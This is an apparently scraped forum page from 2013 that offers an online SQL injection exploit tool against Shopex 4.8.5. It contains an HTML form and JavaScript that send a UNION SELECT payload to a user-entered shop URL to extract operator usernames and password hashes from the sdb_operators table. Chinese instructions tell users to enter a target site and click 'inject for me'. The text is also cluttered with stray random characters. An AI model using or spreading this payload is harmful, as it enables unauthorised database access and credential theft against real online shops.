<center>
Q$ S4 S |$ S ~) m3 e; k( Q7 ^<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>; _! E7 }/ @; g( b& v: a5 L
<form action="" method="post" name="submit_url">
) Y) X8 d6 _. g网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>4 O, M$ P5 ]# h2 [- y
<input type="hidden" name="goods[goods_id]" value="3">! p r. U& [$ ^. D
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
) Y6 U) y. s0 {' F<input type="submit" value="给我注入" onclick=fsubmit()>
! V9 T J- a* C' o</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
6 ^! s! |# _7 q6 t( L& D- F2 W; D6 [3 y- z2 x" {' ^, @
<script>
+ X# r6 g- V* y+ kfunction fsubmit(){
9 X5 k) d. D, B# `' ^form = document.forms[0];
; Z3 b7 B9 V; S5 k% Q" xform.action = form.url.value+'/?product-gnotify'; ' K9 F- w' a2 v
form.submit(); 1 u4 P: F, R9 v
} * C1 w' L; t" L" c5 V
</script>
+ w2 i+ _1 n# V5 @5 S, y |
发表于 2013-1-23 09:20:52
收藏
支持
反对